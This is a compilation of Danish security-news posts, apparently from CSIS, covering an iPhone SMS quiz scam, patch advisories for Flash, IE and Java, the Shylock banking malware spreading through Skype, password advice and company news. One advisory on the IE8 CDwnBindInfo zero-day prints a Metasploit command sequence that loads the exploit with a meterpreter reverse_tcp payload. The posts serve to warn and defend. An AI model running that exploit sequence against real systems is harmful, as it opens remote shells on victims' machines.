Mange mobil kunder, hos forskellige danske teleselskaber, har i weekenden modtaget en spam SMS som lokker med at man er udvalgt som vinder til en iPhone 5. Der naturligvis tale om svindel og man bør slette denne slags SMS'er.

SMS spam, hvor vilkårlige mobilnumre modtager et godt tilbud, er i stigning. Tendensen har været forudset over en længere periode, og så sent som i weekenden blev endnu en af slagsen skudt i gang.

Den pågældende spam SMS indeholder et link der peger på en webside (mellemrum indlagt af CSIS)
http://apple.dk.vc 5.cc/?p=0114531106584

Se skærmprint herunder.


Her skal man indtaste en kode som f.eks. "0114531106584". At denne kode fungerer, hænger sammen med ovenstående URL, som også er inklueret i SMS spammen. Men faktisk vil ethvert nummer fungere og flytte ofret videre ...

Efter godkendelse flyttes man via websiderne:

supersmsoffers.com
--> nordquiz.com

På Nordquiz skal man besvare en stribe spørgsmål (quiz scam) der vil binde ofret ind i en abonnementsløkke der månedligt vil opkræve 30 dollars i fast abonnementsafgift.

Domænet nordquiz er registeret via "Direct Privacy" men af betingelserne optræder følgende adresse: Bruninieku gaden 12-9, Riga, Letland.

Af vilkår og betingelser på "nordquiz" fremgår følgende, som ved nærlæsning forhåbentligt betyder, at man aldrig vil acceptere sådanne vilkår:

VILKÅR OG BETINGELSER

Anvendelse
1. De vilkår og betingelser der er angivet nedenfor ("Vilkår og betingelser") gælder for den danske version af NordQuiz Trivia Konkurrence ("NordQuiz" service) udbydes online via internettet Foto Chat SIA ("Foto-Chat"), et selskab underordnet Letlandsk lovgivning.Som holder til i  Bruninieku gaden 12-9, Riga, Letland LV-1001.
2. Slutt-brugeren anmoder om NordQuiz service fra Foto-Chat. Disse vil blive leveret af Foto-Chat til slutbruger via internettet, WEB, WAP, GPRS, 3G eller på anden måde.

Generelt
3. NordQuiz - er en WEB trivia konkurrence, hvor deltagerne skal besvare trivia spørgsmål fra forskellige vidensområder. Ved at besvare de spørgsmål, kan brugerne score point for rigtige svar. Deltagerne konkurrerer mod andre deltagere der er registreret på den samme tjeneste i deres land. Slutbrugeren, der svarede rigtigt på de fleste spørgsmål i løbet af kortest mulig tid under konkurrence perioden (Konkurrencen slutter og starter hver årlig kvartal), vinder præmien der fremmes på tilmeldingssiden webside. Alle relevante og tilfældige element undgås i forbindelse med konkurrence konceptet, derfor er denne service en ren viden og færdighedts baseret konkurrence. Trivia deltagerne kan vælge deres præmie på destinationssiden under tilmeldingen til at deltage i quizzen. Der er et bredt utvalg af fede præmier: iPad, ferier, butik kuponer, kontanter checks, LCD TV, notesbøger, Smartphone osv.

Tilmelding / Registrering
4. For at timældes NordQuiz Service, skal slutbrugeren indtaste sit mobilnummer og / eller nogle andre detaljer og / eller oplysninger via fremme webside ("landing page"), som Foto-Chat.
5. Så vil slutbrugeren modtage en SMS til sin mobiltelefon, med et Personal Identification Number ("PIN kode"). Ved at indtaste den modtagne pinkode på destinationssiden og / eller anvende tjenesten, slutbrugeren anerkender og bekræfter, at han/hun har  læst Vilkår og betingelser, er gyldig telefonregning betaler eller har samtykke fra telefonregningens betaler for at bruge denne service og er 18 år gammel.

Omkostninger og priser
1. En enkelt deltagelse i NordQuiz konkurrencen koster 150 kroner, der opkræves via telefonregning, i henhold til det mobilnummer tilvejebragt under registreringsprocessen beskrevet nedenfor. Dataoverføringsomkostninger kan forekomme.
2. Alle meddelelser sendt og modtaget fra Foto-Chat, almindelige udgifter for at sende tekst beskeder, som er fastsat af de operatører, kan forekomme. Slutbrugeren vil betale for alle Premium SMS besked modtaget dem fra Foto-Chat.
3. Afgifter debiteres mod slutbrugerens konto af operatøren, i tilfælder af et forudbetalt abonnement, er omkostninger fratrækkes slutbrugerens kreditsaldo. Slutbrugeren giver hermed udtrykkeligt hans eller hendes tilladelse til opladning, og forpligter sig til fuld betaling for de afgifter, der opstår som følge af deltagelse i NordQuiz konkurrencen. Efter gensidig overenskomst er det muligt at arrangere betaling af gebyrer ved hjælp af et alternativ middel (for eksempel kreditkort).
4. Slutbrugeren skal være mindst 18 år gammel. Hvis du ikke er den person der er ansvarlig for at betale mobilregningen eller er under 18 år, bedes du indhente tilladelse fra betaleren af mobilregningen, forældre, værge, arbejdsgiver før tilmelding og / eller deltage i tjenesten. Ved at abonnere og / eller deltage i tjenesten, forudsætter Foto-Chat, at slutbrugeren har opnået den nødvendige tilladelse, samtykke eller godkendelse fra betaleren af ​​den mobilregningen, værge eller forældre.
5. Alle SMS-beskeder, der sendes af slutbrugeren vil blive opkrævet af slutbrugerens mobilselskab for standard takst. Disse takster kan variere for de ulike operatører. Kontakt din operatør for at få flere oplysninger om de afgifter, der pålægges af dem.

Konkurrencen
6. Konkurrencen starter ved 1. i hvert årlig kvartal klokken 00:00:00 og varer tre måneder ("Konkurrence Periode").
7. Slutbrugeren, der er anmeldt NordQuiz konkurrencen og svarede rigtigt på flest trivia spørgsmål iløbet af  kortest mulig tid under konkurrence perioden, vinder præmien der fremmes på tilmeldingssiden webside.
8. Slutbrugeren bliver nødt til at konkurrere mod andre slutbrugere fra Danmark og dem der deltog i konkurrencen i den samme konkurrence periode.
9. Konkurrencen består af 10 spørgsmål. For at besvare spørgsmål og deltage i konkurrencen skal slutbrugeren logge på www.nordquiz.com / dk
10. Indlogingsdetaljer sendes i slutningen af ​​registreringsprocessen. Kun betalte slutbrugere (slutbrugerne, som det lykkedes opkræves for tjenesten) vil modtage login oplysninger.
11. Hvis der ved afslutningen af ​​konkurrencen, er flere slutbrugere der scorede det samme antal point, vil vinderen blive bestemt i en sidste runde ("tiebreaker"). De slutbrugere der kvalificerede sig til finalen vil blive informeret via SMS. I den sidste runde, vil disse kvalificerede slutbrugere får et spørgsmål via SMS og skal besvare (også via SMS) korrekt og så hurtigt som muligt. Tiebreak spørgsmålet vil blive sendt på et bestemt tidspunkt, om hvor slutbrugerne vil blive informeret. Slutbrugeren, som var den hurtigste til at svare korrekt på spørgsmålet, vinder.

-

Vi har blokeret de pågældende websider i CSIS Secure DNS og vores kommende Heimdal Security Agent til Smartphones vil naturligvis indeholde samme beskyttelse.

Adobe har udsendt en sikkerhedsopdatering, som henvender sig til Adobe Flash Player 11.5.502.110 og tidligere versioner under Windows og Macintosh.

Med denne sikkerhedsopdatering er der fokus på at korrigere tre forskellige sårbarheder, som er relateret til CVE-2012-5676, CVE-2012-5677 og CVE-2012-5678. Der er tale om henholdsvis et buffer overflow, integer overflow samt korruption af hukommelsen der for alle CVE-IDs kan føre til arbitrær kode kørsel. En ondsindet person kan potentielt misbruge en eller flere af disse sårbarheder til at gennemføre klassisk klient side drive-by angreb mod ikke opdaterede installationer. Vi vurderer samlet set denne opdatering som værende kritisk, hvorfor den også skal installeres snarest muligt.

Opdateringen bør installeres på følgende versioner af Adobe Flash Player:

-  Adobe Flash Player 11.5.502.110 og tidligere versioner til Windows og Macintosh

- Adobe Flash Player 11.2.202.251 og tidligere versioner til Linux

- Adobe Flash Player 11.1.115.27 og tidligere versioner til Android 4.x

- Adobe Flash Player 11.1.111.24 og tidligere versioner til Android 3.x og 2.x

- Adobe AIR 3.5.0.600 og tidligere versioner til Windows og Macintosh, Android og SDK (inklusiv AIR til iOS)

CSIS arbejder på at udsende en opdatering til Heimdal Security Agent som automatisk vil opdatere sårbare installationer.

Yderligere oplysninger:
http://www.adobe.com/support/security/bulletins/apsb12-27.html

Hen over de seneste dage har vi observeret en sand storm af spammails der udspringer fra det sociale netværk "skillpages.com".

Formålet med de tusindvis af e-mails, som både stammer fra høstede mailinglister og private adressekartoteker, er at indlemme flere brugere i det sociale netværk. Invitationerne kommer tilsyneladende fra personer der selv frivilligt har tilmeldt sig tjenesten, og med samme accept har sagt god for at "skillpages" må udsende invitationer til alle kontakter på dennes vegne (!).

Denne fremgangsmåde er naturligvis på vippen af god skik og praksis og har herhjemme givet anledning til mange bekymrede brugere har kontaktet CSIS for at forstå hvorfra disse invitationer kommer, og vigtigst af alt, om de er skadelige. Det korte svar på dette spørgsmål er nej! Det er der ikke noget der tyder på.

De inkluderede links indeholder alle sammen en underliggende HREF der peger på websiden "skillpages.com" og en efterfølgende UID (user identifikator). Vi antager at denne (UID) tjener to formål; dels at validere, at den e-mail adresse som invitationen er sendt til ret faktisk er aktiv, og at modtageren har klikket på linket og dels at relatere invitationen til den konto som har udsendt invitationen. 

Et skærmprint af invitationen er gengivet herunder:

CSIS er i øjeblikket i gang med at granske "EULA" til Skillpages.com, da meget tyder på, at en del af applikationen, som for øvrigt er knyttet til Linkedin, ser ud til at høste alle adresseoplysninger fra maskinen, som så vil modtage en tilsvarende invitation. Derved opstår en uheldig viral effekt.

For at bremse dette og indtil vi har et bedre overblik har vi midlertidigt valgt at blokere for adgangen til Skillpages.com i CSIS Secure DNS hvorved blokeringen også slår igennem på Heimdal PRO og Corporate.

Vi har hos CSIS deltaget i review på et netop publiceret teknisk whitepaper der belyser de forbedringer som åbnes med de nye gTLDs, og særligt i forbindelse med muligheden for en standardisering omkring abuse-håndtering.

Med flere end 240 millioner registrerede domæner i midten af 2012 er vedligeholdelse og administration blevet en selvsagt vanskelig og udfordrende opgave for både domæne registratorerer, som lever godt som industri i et hastigt voksende marked, og på den anden side, it-sikkerhedsfirmaer, som CSIS, der dagligt blokerer og nedskyder domæner oprettet alene med det formål at være fjendtlige.

Med den nye internet struktur og med introduktionen af de nye gTLDs er der omsider mulighed for at opnå konsensus omkring hvordan denne voksende udfordring skal takles så der kan arbejdes med standardiseringer på tværs af industrierne.

Med dette whitepaper belyses sikkerheden i og omkring de nye og mere sikre
gTLDs. Vi håber alle med interesse i it-sikkerhed vil afsætte tid til at læse dette whitepaper.

Det nye whitepaper "The New gTLDs – Security by Design" kan hentes gratis på adressen:
http://newgtldsecurity.com/pdf/new_gtld_white_paper.pdf

For tre måneder siden lancerede CSIS Security Group A/S, som de første i Danmark, et nyt koncept til det private erhvervsliv, og kan nu bryste sig af at være blandt de få virksomheder i verden, der er blevet autoriseret med CERT™ af Software Engineering Institute hos Carnegie Mellon University.

Med baggrund i den velfunderede erfaring og viden, som CSIS har om det regionale såvel som internationale trusselsbillede, lancerede virksomheden i september i år et CSIRT-koncept (Computer Security Incident Response Team).

Konceptet handler grundlæggende om, at CSIS varetager forskellige områder af it-sikkerhed for virksomheder og offentlige institutioner; herunder computer forensics, sikkerhedsarkitektur, incident response, netværks- og penetrationstests mm. Specialisterne i CSIS løber i front med de nyeste tendenser og metodikker i it-sikkerhedsbranchen, hvilket bl.a. gav dem førstepladsen ved DefCon (det uofficielle verdensmesterskab i hacking).

”Konceptet har fået en flyvende start, og er blevet taget godt i mod af en del virksomheder allerede. Vi er bestemt stolte af at være den eneste private virksomhed i Danmark, der er blevet autoriseret med CERT™, og det er i den grad et kvalitetsstempel for de services vi leverer” udtaler Allan Mortensen, administrerende direktør i CSIS.

En af de udfordringer, der de kommende år vil vokse sig større for alle firmaer, er risikoen for datalækager. Derfor drøftes det pt. i EU hvor stor en økonomisk straf virksomheder skal pålægges, hvis der undlades at blive oplyst om lækager af kunders personlige data. Med det nye koncept fra CSIS sikres virksomheder ligeledes at kunne opretholde et godt renommé, da risikoen for sådanne uventede hændelser minimeres markant.

CSIS har i mange år leveret en tilsvarende service til den finansielle sektor hvor den mørke del af nettet overvåges. Denne service er nu åben for alle segmenter, herunder virksomhedssegmenter som har intelligent properties, følsomme data, design, patenter og andet som er vigtigt proaktivt at kunne beskytte.

Læs mere her: http://www.csis.dk/da/business/cert/

Vi ønsker hermed alle kunder og venner en glædelig jul!

Vi håber at alle vil opleve en højtid i selskab med familie og venner.

Det er vores erklærede mål for 2013 at hjælpe til med at gøre Internettet mere sikkert. Det vil vi også arbejde benhårdt for i det kommende år.


Mange julehilsner fra alle i CSIS

Når virksomheder verden over dagligt udsættes for cyberangreb, bliver en forsikring mod sådanne uforudsete hændelser højaktuel. Derfor har CNA, et amerikansk forsikringsselskab med kontor i København, indgået samarbejde med CSIS, der er specialister i it-sikkerhed og Nordens førende leverandør af anti-eCrime services.

Datalækager forårsaget af hackere er næsten fordoblet siden 2011, og i dag udgør cyberangreb 58% af årsagen til datatab ifølge Open Security Foundation. En række danske virksomheder har oplevet at være i den uheldige situation, der har haft indflydelse på både troværdigheden, økonomien og generelt imaget. Derfor tegner flere og flere en cyberforsikring, da intet tyder på, at angrebene vil aftage de kommende år.

CNA er en af de største udbydere af cyberforsikringer i Skandinavien, og it-sikkerhedsfirmaet CSIS vil nu bistå med skadesbehandling og direkte hotline support til CNA’s kunder ved virus- og hacking angreb.

Vil du vide mere om Netprotect Cyberforsikring, kontakt da:
Søren Stryger
Soren.Stryger@cnaeurope.com

En kritisk 0-dags sårbarhed, som er blevet misbrugt i målrettede spear phishing angreb udført mellem jul og nytår, hjemsøger Microsoft Internet Explorer 8.x og ældre versioner.

Der er desværre allerede frigivet detaljerede oplysninger om sårbarheden samt modul til Metasploit. Sårbarheden kan udnyttes til at afvikle arbitrær kode mod mål som kan lokkes til klikke et link eksempelvis fremsendt via en e-mail, eller ved at besøge en kompromitteret webside. 

Vi er bekendte med at hjemmesiden tilhørende "Council on Foreign Relations" (CFR) over et par dage i indeværende uge har leveret skadelig kode mod websidens besøgende. Der er således tale om et "waterhole" drive-by scenarie, som bl.a. har været anvendt til at trænge længere ind i netværket hos CFR via klient infektioner, men også et angreb der kan påvirke talrige andre organisationer som har interesse i indholdet på CFR's webside.

Det indlejrede javascript har taget højde for hvilket sprog browseren anvender og såfremt dette ikke lever op til kriterierne, som er "English (U.S.)", "Chinese (China)", "Chinese (Taiwan)", "Japanese", "Korean", eller "Russian" har det undladt at affyre sin skadelige payload. Samtidig har exploitet placeret en browser cookie for at sikre at exploitet kun leveres en gang mod en klient der besøger websiden. Samme teknik ses anvendt i kommercielle exploitkits, og skal bl.a. gøre det vanskeligere at efterforske en incident. 

I det konkrete angreb mod CFR, som der er åbenhed omkring,anvendes "today.swf" (se injektet kode herunder) til at gennemføre heap spraying mod Microsoft Internet Explorer. Sårbarheden der misbruges er af typen "use after free" og optræder i MSHTML og mere specifikt objektet "CDwnBindInfo". Koden som var injektet på CFR's webside så ud som følgende:


Ovenstående script referer til "xsainfo..jpg" som er en Windows DLL, XOR'd med nøglen 0x83. Ved brug af Exiftool kan vi udtrække følgende oplysninger der afslører diverse metadata og ikke mindst en reference til filens oprindelige navn "test_gaga.dll":

SubsystemVersion.........: 5.0
InitializedDataSize......: 385536
ImageVersion.............: 0.0
ProductName..............: TODO: <         >
FileVersionNumber........: 1.0.0.1
UninitializedDataSize....: 0
LanguageCode.............: Chinese (Simplified)
FileFlagsMask............: 0x003f
CharacterSet.............: Windows, Chinese (Simplified)
LinkerVersion............: 9.0
FileOS...................: Win32
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............: 1.0.0.1
TimeStamp................: 2012:12:12 11:06:04+00:00
FileType.................: Win32 DLL
PEType...................: PE32
InternalName.............: test_gaga.dll

0-dags angreb mod MIcrosoft Internet Explorer 8 og ældre
Sårbarheden ser ud til at være effektiv mod Microsoft Internet Explorer 8 og alle ældre versioner. Den er tildelt CVE-ID: CVE-2012-4792. 

Med de data og detaljer som allerede nu er gjort tilgængelig, vil vi se denne sårbarhed blive misbrugt i mere vidtspredte angreb hen over de kommende måneder. Der er i den forbindelse allerede udviklet et modul til Metasploit som kan anvendes som udgangspunkt for it-kriminelle.


use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid

En demonstration af Metasploit i aktion kan findes på YouTube:


Microsoft har netop publiceret "Security Advisory 27942" (http://blogs.technet.com/b/msrc/archive/2012/12/29/microsoft-releases-security-advisory-2794220.aspx) som bekræfter sårbarheden, og som samtidig begrænser den til udelukkende at omfatte Microsoft Internet Explorer version 8.x samt ældre versioner herunder 6.x og 7.x. Nyere versioner af IE er således ikke fejlbehæftet.

Det forlyder endvidere at Microsoft allerede har en sikkerhedsopdatering klar når årets første sikkerhedsopdateringer (patch tirsdag) frigives d. 8.1. 2013. Men inden da kan vi forvente at se et "Fix-it" værktøj som temporært lapper sårbarheden indtil der foreligger et officielt patch.

Yderligere oplysninger:
http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/
http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/

Mens jeg skriver dette er flere end 100,000 maskiner i Danmark inficeret med virus! Hovedparten af disse er direkte koblet ind i et såkaldt BOTnet der betyder at it-kriminelle har mere kontrol over maskinen end ejeren selv.

En virus inficeret maskine, som er en del af et BOTnet, kan misbruges på talrige måder bl.a. udsendelse af spam, angreb mod andre (DDoS), trafik relay og værst af alt systematisk indsamling af data der ligger på harddisken samt al trafik der går til og fra maskinen. Den slags indtrængen kan selvsagt føre til at it-kriminelle ikke alene opnår viden om dit privat liv, men også kan få fingrene i andre sensitive oplysninger, såsom kreditkort, brugernavne og passwords til Facebook, Hotmail, Skype, NemID, CPR-nr osv.

Et nytårsforsæt, som virkelig ville gøre en forskel for dig selv og andre på Internettet, var at man besluttede sig for, endegyldigt at sige NEJ TAK til virus og skadelig kode på sin PC. Og på tærsklen til et nyt år, hvorfor ikke gøre præcist det?

Herunder følger 5 tips som gør det lettere at opfylde dit nytårsforsæt om et virusfri 2013:

1) Er du allerede inficeret af virus? Geninstaller din PC
Har du mistanke om at din PC er inficeret med virus, så tag backup af dine vigtige data og geninstaller Windows. På den måde er du sikker på at året starter på en frisk!

2) Antivirus gratis eller betalingsløsning?
Har du allerede et antivirus program installeret? Hvis ikke, så findes der både løsninger som kan købes eller som kan installeres gratis såfremt det anvendes til privat brug. Hvis du overvejer at købe en licens så kan det være en god ide at undersøge hvilket der er bedst til at detekte virus. Man kan evt. konsultere sig hos AV-test og deres uafhængige test som findes her: http://www.av-test.org/en/tests/home-user/windows-7/sepoct-2012/

Testen har fokus på tre egenskaber: detektion af virus, evnen til at rense og reparere og brugervenlighed.

Gratis Antivirus til Windows
Hvis du ikke har planer om at bruge penge på antivirus så findes der gode gratis løsninger:

http://free-av.com (gratis antivirus fra Avira) *
http://www.avast.com/free-antivirus-download (gratis antvirus fra Avast)
http://free.avg.com (Gratis antivirus fra AVG)
http://windows.microsoft.com/da-DK/windows/security-essentials-download (Microsoft Essentials)

* Anbefales af CSIS når der skal vælges en gratis Antivirus løsning. Antivir er brugervenligt, god til at fange virus, og optager ikke betydelige ressourcer på systemet.


Husk, at inden du installerer et nyt antivirus program, er det vigtigt du først fjerner dit gamle, så de to løsninger ikke kolliderer med hinanden. Du kan fjerne dit gamle antivirus software via kontrolpanelet og tilføj/fjern programmer. Du forudsætter sandsynligvis en genstart af maskinen.

3) Opdater automatisk dine programmer
Sørg for at opdatere dine programmer og særligt de tredjepartsprogrammer der er installeret på din PC. At det er helt essentielt at opdatere populære programmer fremgår klart af vores analyse ”Sådan bliver Windows ramt af virus”: http://www.csis.dk/da/csis/news/3321/

At opdatere programmer kan være besværligt og tidskrævende, hvorfor vi anbefaler at man vælger vores sikkerhedsprogram Heimdal Security Agent, som findes både i en gratis version der må bruges i privat sammenhæng og en PRO udgave der bl.a. forhindrer dig i at besøge ondsindede websider og samtidig beskytter mod phishing og svindel.  Du kan hente din gratis udgave af Heimdal her: https://www.heimdalagent.com


Heimdal opdaterer automatisk alle programmer der løbende bombarderes med angreb fra it-kriminelle og forhindrer derved virus i at trænge ind på maskinen. Værktøjet er udviklet i Danmark, respekterer dit privatliv samtidig med at det fungerer sammen med andre sikkerhedsprogrammer.   

4)    EMET - gratis sikkerhedsværktøj fra Microsoft
Der er mange, som endnu ikke kender til EMET (Enhanced Mitigation Experience Toolkit), men det burde man. EMET er et gratis værktøj fra Microsoft der bl.a. beskytter operativ systemet mod forskellige former for angreb. Værktøjet er gratis, brugervenligt og kan hentes gratis hos Microsoft. Du kan læse mere om EMET hos Microsoft på adressen: http://support.microsoft.com/kb/2458544 på samme side findes også link til download af EMET.


5)    Brug din sunde fornuft
Lad være med at klikke på links i e-mails som du modtager uopfordret. Undlad også at åbne vedhæftede filer. Selvom mange angreb i dag kommer fra ondsindede websider så er der stadig mange it-kriminelle som spammer uønskede e-mails ud. Slet dem.

Og til slut herfra et ønske om et godt og sikkert nytår!

Så skete det igen! European Nopsled Team har endnu engang vundet en anerkendt Capture The Flag-konkurrence; denne gang under den tyske hackerkonference Chaos Communication Conference 2012. Holdet har de sidste par år derudover også formået at vinde både første- og tredjepladsen til det uofficielle verdensmesterskab i hacking (læs mere her).

CTF-konkurrencen foregik over 3 dage den sidste uge af december, men på trods af de mange dygtige deltagere blev vinderholdet allerede fundet på 2. dagen, som dermed kunne springe nytåret ind med endnu en prestigefyldt pris i bagagen. Bag European Nopsled Team står bl.a. tre medarbejdere fra CSIS Security Group, der altså sagtens kan kalde sig nogle af verdens bedste indenfor it-sikkerhed.

Yderligere oplysninger om 29c3 CTF: https://twitter.com/29c3ctf/

Det er netop blevet bekendt, at brugere kan risikere at få malware på computeren blot ved at have Java installeret og aktiveret. Årsagen er en ny og hidtil ukendt sårbarhed i Java JRE, som misbruges aktivt mod alle typer Windows-maskiner og potentielt også mod Mac og Linux. Sårbarheden vurderes som en stor trussel, idet udbredelsen af Java er så udbredt – og for at gøre ondt værre, så findes der heller ikke en patch fra producentens side, som løser problemet. Således har CERT'er i flere lande decideret anbefalet, at brugere afinstallerer eller de-aktiverer Java JRE.

Der vil altid ligge en risiko for eksponering, idet angrebene kan komme fra selv legitime hjemmesider. Hos CSIS Security Group er der imidlertid gjort alt for at mindske denne risiko for angreb ved at blokere for angrebspunkter i løsningerne Secure DNS og Heimdal Pro, hvorfor det anbefales, at brugere erhverver sig et program – som Heimdal Pro – der beskytter mod angreb.

For en mere teknisk gennemgang henvises der til følgende artikler, hvor bl.a. Jan Kaastrup fra CSIS Security Group har udtalt sig: http://www.computerworld.dk/art/223563/kaempe-0-dags-hul-fundet-i-java-din-netbank-i-fare samt http://www.version2.dk/artikel/sikkerhedsekspert-slaar-alarm-4-millioner-nemid-brugere-truet-af-kritisk-java-hul-49789

Beskyt din computer med fx Heimdal Pro: https://www.heimdalagent.com/en/home

CSIS har i løbet af de seneste måneder haft malware familien "Shylock" under tæt monitorering. I forgårs blev en ny opdatering skubbet ud via bandens centrale C&C (Command & Control) server. Denne indeholder en funktion der gør det muligt for denne netbank tyv at sprede sig til ofre via Skype. 

Det nye modul/plugin til Shylock hedder "msg.gsm" og skubbes ud via en opdateringsfunktion. Alle inficerede maskiner vil automatisk modtage dette plugin/modul som gør det muligt at sende chat beskeder indeholdende links fra en inficeret maskine til dennes Skype kontakter og generelt monitorere og manipulere med Skype. Et udsnit af koden, som skubbes ud fra Shylocks centrale C&Cs, findes herunder: 


Shylock er særligt sofistikeret idet den målrettet går efter SMB (Små og mellemstore virksomheder) markedet. Den forsøger at lave realtids MiTM (Man in The Middle) angreb når ofret gennemfører netbank transaktioner. Den er primært fokuseret på det engelske marked, men også andre lande, udenfor England, er plaget af denne malware. Vi har udarbejdet et landkort der viser hvor Shylock inficerede maskiner befinder sig.


Generelt er det vores vurdering, at der med Microsofts migration af brugere fra MSN til Skype, vil ske en stigning i malware som vil forsøge at misbruge Skype som kanal for yderligere replikation. Der er masser af muligheder for at gøre det, og bl.a. chat funktionen i det populære VoIP system, er en oplagt mulighed.  

Shylock angriber på nuværende tidspunkt ikke mål i Danmark men vi følger denne trussel tæt.

Antivirus detektion er lav, men CSIS beskytter både via Secure DNS og Heimdal PRO og corporate.

CSIS Security Group kunne sent i går aftes rapportere om en ny og sofistikeret måde, hvorpå en bestemt type virus er i stand til at sprede sig igennem Skype. Det forventes, at især Europa og USA vil blive hårdt ramt, da Skype er meget udbredt her.

Virussen, der har fået navnet Shylock, spreder sig fra allerede inficerede computere ved at sende en meddelelse igennem Skype til alle brugerens venner. Da afsenderen af meddelelsen er en allerede accepteret kontaktperson, da vil risikoen for at indholdet vurderes som troværdigt være høj. Følger vennerne anbefalingerne i meddelelsen, vil deres computere også inficeres af samme virus, og de vil herefter begynde automatisk og intetanende selv at sprede virussen til deres venner.

Hovedformålet med denne virus er primært at stjæle finansielle data fra virksomheder såvel som privatpersoner. Herudover stjæler informationstyven bag virussen både brugernavne og kodeord relateret til alle typer online web portaler såsom Facebook, Gmail, Hotmail, etc.

Desværre opdages denne virus sjældent, hvorfor det kan være en udfordring at beskytte sig mod angreb. En mulighed er dog at købe programmer, der på forhånd beskytter mod sådanne angreb, såsom produktet CSIS Heimdal Pro eller CSIS Secure DNS.

For mere information om truslen læs her.
Udenlandske medier har allerede dækket sagen - se mere her.

Jyllands-Posten og CSIS Security Group er gået sammen om at lave et tv-indslag om, hvordan du igen sikkert kan bruge netbank og andre services, der kræver det tidligere inficerede Java-program for at køre.

Tv-indslaget består af en simpel guide om, hvordan du kan downloade den nyeste version af Java. Den opdaterede version har lappet sikkerhedsbristen i Java, som dermed lukker hackerne ude og sikrer dig en sikker adgang til fx din netbank.

Se tv-indslaget HER!

Medierne har de sidste par uger kunne berette, at Google ikke længere tror på de traditionelle adgangskoder, men i stedet forsøger at finde alternative brugervaliderings muligheder. Det vil uden tvivl være spændende at følge deres proces, men indtil da vil vi komme med vores råd til, hvordan du kan lave en sikker adgangskode.

Nogle af Jer har sikkert set denne XKCD tegning, som forklarer problemet med mange passwords guides, der hovedsageligt er designet i overensstemmelse med forældede adgangskodepolitiker. Billedet er på engelsk:

Og når vi snakker om svage adgangskoder: Bruger man den samme adgangskode til forskellige sider, er dette problematisk, idet der ses mange eksempler, hvor brugerdatabaser med usikre gemte adgangskoder er blevet lækket.

Nedestående er vores råd til at lave en adgangskode, der både er nem at huske og stærk. Husk at lave en unik adgangskode til alle dine kontoer.

Guide til en stærk adgangskode

Når man skal lave en stærk adgangskode, som er nem at huske, er tricket at oprette en adgangskode, som er lang og giver mening, men som ikke har et specifikt mønster, der kan anvendes til at begrænse kombinations-tests, som fx en adgangskode der…

• kun eksisterer af ord i ordbogen
• bruger typiske substitutter som fx 1 i stedet for I
• indeholder dit navn, brugernavn, alder, fødselsdag, hundens navn eller andre informationer, der er relateret til dig, og som dermed hurtigt kan gættes.
• bruger en kombination af bogstaver i rækkefølge fra tastaturet som fx asdfghj

Prøv at bruge disse fire trin, når du laver en sikker adgangskode

1. Start med en sætning eller to. Det kan fx være et citat fra en bog, sang eller film, som du kan lide:

Kvik se. Det er en dansker (citat fra Matador)

2. Ændrer sætningen en smule, så den ikke matcher fuldkomment. Brug fx nogle af disse metoder:

• Ændrer et af ordene til et andet ord, som findes i ordbogen:

Kvik se. Det er en svensker.

• Brug tegn til at ændre sætningen:

Kvik se-det er en dansker

• Fjern nogle af mellemrummene:

Kviksedet erendansker

• Kombiner en del af sætningen med en anden sætning, som giver mening for dig:

Det er en dansker Min cykel er rød

Vigtigst af alt: Vær sikker på at adgangskoden ikke er for svær for dig at huske!

3. Den dovne men effektive måde hvorpå man kan huske forskellige adgangskoder er blot at tilføje et unikt sæt ord eller bogstaver til starten eller slutningen af sætningen:

Det er en dansker Min cykel er rød IN (som fx til din LinkedIN adgangskode)

4. Til at starte med kan du overveje at nedskrive adgangskoden på et lille stykke papir og gemme det, indtil du er helt sikker på, at du kan huske den.

• Brug ikke en computer som dit notes papir, men skriv det på et rigtig stykke papir.
• Skriv kun adgangskoden – ingen reference, der giver mening!
• Gem papiret et hemmeligt sted, som du kan huske – fx i en dvd-boks eller mellem dine madopskrifter.

Hvis du ønsker at teste din nye adgangskode, da har Steve Gibson et lækkert værktøj præcis til dette - se her.

Held og lykke med ændringen af dine adgangskoder!

En frisk 0-dags sårbarhed, som påvirker en lang række versioner af Microsoft Office, er sat til salg hos "Inj3ctor". Sårbarheden bliver præsenteret som "Microsoft Office 2003/2007/2010 Command Execution 0day" og kan angiveligt fungere ved at lokke et offer til at klikke på et link, eller fremsende særligt udformede dokumenter. Det er således et yderst potent digitalt våben og særligt i de forkerte hænder. 


Proof of Concept (PoC) sælges til en interesseret køber for den nette sum af 20,000 webmoney, hvilket er en "internet valuta" der matcher og følger amerikanske dollars.

Der er samtidig postet en demonstration på Youtube som angiveligt viser hvordan sårbarheden misbruges i praksis: 
http://www.youtube.com/watch?v=pKhulHEFrR0. 

Exploitet sælges af "1337Day Team". Samme gruppe eller individ har tidligere fundet og publiceret talrige sårbarheder via samme database.

Det er vigtigt at understrege at CSIS ikke har haft adgang til koden, og således ikke kan bekræfte om dette er reelt.

Rapid7 er ude med en advarsel om at millioner af enheder på Internettet er sårbare overfor simple angreb via uPNP (http://da.wikipedia.org/wiki/Universal_Plug_and_Play) protokolen. Det kan i værste konsekvens føre til systematiske portscanninger efter sårbare systemer, målrettede og sporadiske angreb og endda selv-replikerende kode.

Problematikken omkring WAN tilgængelige uPNP enheder er naturligvis kritisk, men handler i høj grad også om dårlig bruger disciplin, forældede og ikke driftede servere, og endeligt at enkelte ISP'ere ikke har skærmet de protokoler der transporterer uPNP trafik. 

Allerførst lad os slå fast: uPNP burde udelukkende være tilgængelige via LAN - hvis overhovedet - og absolut ikke via WAN. Det er protokolen slet ikke designet til. 

uPNP understøttelse kan optræde i routere, NAS servere, Xboxe, Playstations og SmartTVs, Linux og Windows installationer, men faktisk bør uPNP slås helt fra, idet enhederne fint kan kommunikere og fungere uden understøttelse af "autodiscovery" og uPNP. Det er ingen undskyldning at man har behov for uPNP til spilkonsoler. Det er en myte.

Sandheden er uPNP ikke er baseret på nogen form for authenfikation (den er "broadcast-to-discover -> unicast-to-access protocol baseret" og derved er en tikkende bombe under systemer der har uPNP slået til.

CSIS anbefaler at man deaktiverer alle uPNP services på udstyr i virksomhedens netværk.

Yderligere oplysninger:
